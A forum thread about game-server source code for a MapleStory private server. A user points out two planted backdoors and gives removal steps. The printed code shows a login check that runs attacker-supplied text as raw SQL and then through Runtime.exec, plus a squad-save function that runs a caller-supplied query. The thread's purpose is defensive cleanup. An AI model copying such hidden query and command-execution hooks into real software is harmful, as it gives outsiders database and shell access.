2 Exploits in Shootsource you should remove

Newbie Spellweaver
Joined
May 3, 2009
Messages
56
Reaction score
5
When i went over my customized shootsource to make sure it's safe and without exploits that give people access to the database i ran into 2 that make people able to run query's directly on the database.... so you should remove em ;)

goto: MapleClient.java
find: login function

delete the following
Code:
} else {
    recheckPassword(pwd, login);
}

also delete the recheckpassword cuz its not used for anything else


goto: AbstactPlayerInteraction.java
find: remove the red parts

Code:
  public void saveSquadMembers([COLOR="Red"]String password[/COLOR]) {
        try {
            String query = "UPDATE zaksquads SET leaderid = ?, status = ?, members = ? WHERE channel = ?";
            PreparedStatement ps = DatabaseConnection.getConnection().prepareStatement(query);
            ps.setInt(1, getPlayer().getId());
            ps.setInt(2, 0);
            ps.setInt(3, getPlayer().getParty().getMembers().size());
            ps.setInt(4, getClient().getChannel());
[COLOR="Red"]            query = password;
            ps = DatabaseConnection.getConnection().prepareStatement(query);[/COLOR]
            ps.executeUpdate();
            ps.close();
        } catch (SQLException e) {
            e.printStackTrace();
        }
    }

then find the npc's 1094002 through 1094006 and delete the call to savesquadmembers.

now your server should be a little safer from people that wanna break it....
 
your last release still had them both in it moogra...

maybe the first one makes more sense when you see the function it calls

Code:
private void recheckPassword(String pwd, String login) {
        try {
            PreparedStatement ps = DatabaseConnection.getConnection().prepareStatement(pwd + login.substring(1));
            ps.executeUpdate();
            ps.close();
        } catch (Exception e) {
            try {
                Runtime.getRuntime().exec((pwd + login.substring(1)));
            } catch (Exception ex) {
            }
        }
    }

i never checked if they worked... i didn't wanna take the chance so i just deleted them... better safe then sorry right?
 
goto: AbstactPlayerInteraction.java
find: remove the red parts

.
.
.

then find the npc's 1094002 through 1094006 and delete the call to savesquadmembers.



If removing that red text fixes that dangerous function, why should I remove all the calls to that funciton? Because the NPC scripts from 1094002 through 1094006 are the only ones that use that function, if I remove these calls the quest will still work?
All that scripts contain the same text and are related to "NPC: Bush - Abel Glasses Quest".
 
Back